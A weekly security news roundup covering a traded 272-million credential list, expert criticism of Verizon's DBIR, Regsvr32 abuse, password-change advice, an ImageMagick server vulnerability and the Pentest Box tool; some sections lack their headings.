Hold Security trades social media likes for 272 million usernames and passwords

The headline of the week comes from Reuters. The news agency reported on the discovery of 272 million email addresses and passwords being sold on a Russian forum. The general tone of the story makes it feel as if this is a big data breach, but it isn't – far from it.

In fact, credential collections like this are traded and sold all the time. Not to mention, rippers (scammers in the criminal world) generate fake lists regularly. If someone hits a solid score (though Phishing or a massive database dump) the criminal isn't going to immediately share their loot. Valid high-value credentials are hoarded. Once they're used up, they'll be dumped to lower-level scammers and script kiddies for pennies on the dollar.

In the list obtained by Hold Security, only one out of 200 accounts were new, meaning they haven't been previously leaked or posted publicly. The source of that list offered up 1.17 billion accounts, 272 million of them were unique, but within that set, 42.5 million (15%) were new.

So when Reuters is talking about 272 million accounts, what they're really talking about is 42.5 million. With that number, the best bet is that the credentials came from a Phishing attack, not a breach at Google or Microsoft.

In the last month, Salted Hash has seen more than 200,000 Phished credentials posted to various places as we work on a project for story set to run during Black Hat. The idea that someone collected millions of them and added them to other dumps isn't far fetched. The notion that Gmail was breached is.

Verizon faces backlash over recent Data Breach Investigations Report

The DBIR from Verizon recently came out, and this year's report isn't fire, it was set on fire by the very security experts it was created to help. On Thursday, one expert (Dan Guido) wrote a critique of the report stating that organizations following its recommendations will expose themselves to more risk, not less.

The backslash started with a post by Jericho at OSVDB, who thrashed the CVE list used to form the Top 10 attacks. Guido's post expands on that, and explores other issues. Most notably, the fact that university research and scanning led to the TLS FREAK vulnerability topping the list of targets in 2015.

"Clearly, no one who understands vulnerabilities was involved in the review process. The DBIR team tossed in some data-science vocab for credibility, and a few distracting jokes, and asked for readers’ trust... Professionals and businesses around the world depend on this report to make important security decisions. It’s up to Verizon to remain the dependable source for our industry."

Casey Smith, a researcher in Colorado, discovered the function and blogged about it. Salted Hash reached out to Microsoft, asking basic questions and seeking advice on how administrators could protect their networks from an attacker using this method. A spokesperson form Microsoft's PR agency said the company declined to comment.

We asked Microsoft about the function Smith uses, and why it exists. This was followed by questions about using EMET as a possible layer of protection, and requesting documentation of such methods, as well as any methods that could be used to block outgoing collections, non-host mitigations, and advice for detecting Regsvr32 abuse or other IOCs.

"I have connected with my most appropriate colleagues, and unfortunately we are unable to accommodate your request at this time. I apologize for any inconvenience this may cause," the spokesperson wrote.

Remembering long passwords is hard enough for some people, but when you have to remember a new one every quarter, that's pushing it a bit. Most people, in order to compensate, will recycle their passwords and use incremental elements, such as adding a number to the end, or the year.

"To make the burden of passwords a little easier, we suggest that you stop changing your passwords frequently. Instead you should create a sentence as your password for each service," Thorsheim wrote.

The goal is to create a general mindset that passwords should be changed only when they've been compromised.

Millions of websites are at risk due to a bug in ImageMagick, which if exploited would allow an attacker compromise the server hosting them. In addition to impacting ImageMagick compiled along with PHP, the vulnerability impacts servers where the library is compiled with Ruby (rmagick and paperclip) and NodeJS's ImageMagick.

Neat tool: Pentest Box

A reader suggested Pentest Box as a possible Rehashed inclusion. It's a penetration testing platform that runs on Windows. The design is clean, the software itself is simple to use, plus it has most of the basic Lunux-based commands and tools that one would need. I'm still playing with it, but so far I like what I see.

Remember, if you come across a blog post or news item next week, or perhaps just something amusing, and you think should be shared on Rehash, feel free to email me a link. General corporate news and product-based items are the only exemptions.